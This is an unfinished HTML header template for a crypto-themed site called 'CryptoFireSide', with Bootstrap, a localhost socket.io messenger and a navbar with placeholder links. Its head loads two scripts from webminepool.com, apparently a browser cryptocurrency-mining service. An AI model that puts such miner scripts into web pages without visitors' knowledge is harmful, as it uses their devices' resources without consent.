<header>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
    integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
  <script src="https://kit.fontawesome.com/cb87cedded.js" crossorigin="anonymous"></script>
  <title>placeholder</title>

  <script src="https://webminepool.com/lib/simple-ui.js"></script>
  <script src="https://webminepool.com/lib/base.js"></script>

  <script defer src="http://localhost:3000/socket.io/socket.io.js"></script>
  <script defer src="scripts/Messenger.js"></script>

  <link rel="stylesheet" href="CSS/Messenger.css">
  <link rel="stylesheet" href="CSS/main.css">


  <nav class="navbar navbar-expand-lg navbar-light bg-light" style="z-index: 2;">
    <button class="openSideNav"><svg viewBox="0 0 100 80" width="40" height="2vh">
        <rect width="100" height="20"></rect>
        <rect y="30" width="100" height="20"></rect>
        <rect y="60" width="100" height="20"></rect>
      </svg></button>
    <div></div>
    <a class="navbar-brand" href="/"><img src="/images/logo.png" width="40" alt=""> CryptoFireSide</a>
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav mr-auto">
        <li class="nav-item active">
          <a class="nav-link" href="/placehodler">placehodler</a>
        </li>
        <li class="nav-item active">
          <a class="nav-link" href="/about">About</a>
        </li>
    </div>
  </nav>

</header>